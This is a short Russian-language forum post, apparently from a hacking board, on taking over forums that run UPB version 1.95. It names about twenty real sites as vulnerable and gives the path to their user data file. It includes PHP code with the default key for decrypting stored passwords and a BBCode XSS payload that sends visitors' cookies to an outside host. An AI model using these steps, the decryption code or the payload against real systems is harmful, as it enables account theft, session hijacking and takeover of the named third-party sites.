|
Возможность захвата сайта с Powered by UPB Version : 1.95.
Данная уязвимость найдена на этих сайтах.
http://www.johnnyhollow.com/forum http://www.laurenpowers.com/forums/ http://lugaversa.altervista.org/forum http://www.avenueq.com/forum/ http://forum.kyrenee.com http://www.fsjames.com/ultimate http://www.ohiospeedskatingtour.com/forum/ http://sta.umbc.edu/orgs/sail/pages/forum http://www.mpcs.ryerson.ca/~research/ http://www.primednr.com/upb/ http://www.killerdwarfs.net/messageboard/ http://www.stompchat.com/forum/ http://www.yeclaserve.com/forum/ http://users.aber.ac.uk/trc99/forum http://www.bus.sfu.ca/clubs/BASS/BAM http://waitz.dnsalias.org/upb/ http://www.hunggakungfu.com/forum/ http://www.diskusjonsforum.com http://www.trek.dp.ua/forum 1) Файлы с пользователями можно смотреть. Например: http://www.johnnyhollow.com/forum/db/users.dat 2) Пароли пользователя можно дешифровать . Ключ везде стоит по умолчанию. Функция дешифрования: <? $key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtn eltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglm wrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupk zvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcui qggccl"; function t_decrypt($text, $key) { $crypt = ""; for($i=0;$i<strlen($text);$i++) { $i_key = ord(substr($key, $i, 1)); $i_text = ord(substr($text, $i, 1)); $n_key = ord(substr($key, $i+1, 1)); $i_crypt = $i_text + $n_key; $i_crypt = $i_crypt - $i_key; $crypt .= chr($i_crypt); } return $crypt; } $text="тут пароль для дешифрации"; echo t_decrypt($text, $key); ?> |
Ну а ещё XSS если послать сообщение вида
Код HTML:
[url=http://www.g.ru" x=` ]xxx[/url]` style=display:none;background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) a="[url=http://www.ru]xxx"[/url] |
| Время: 09:33 |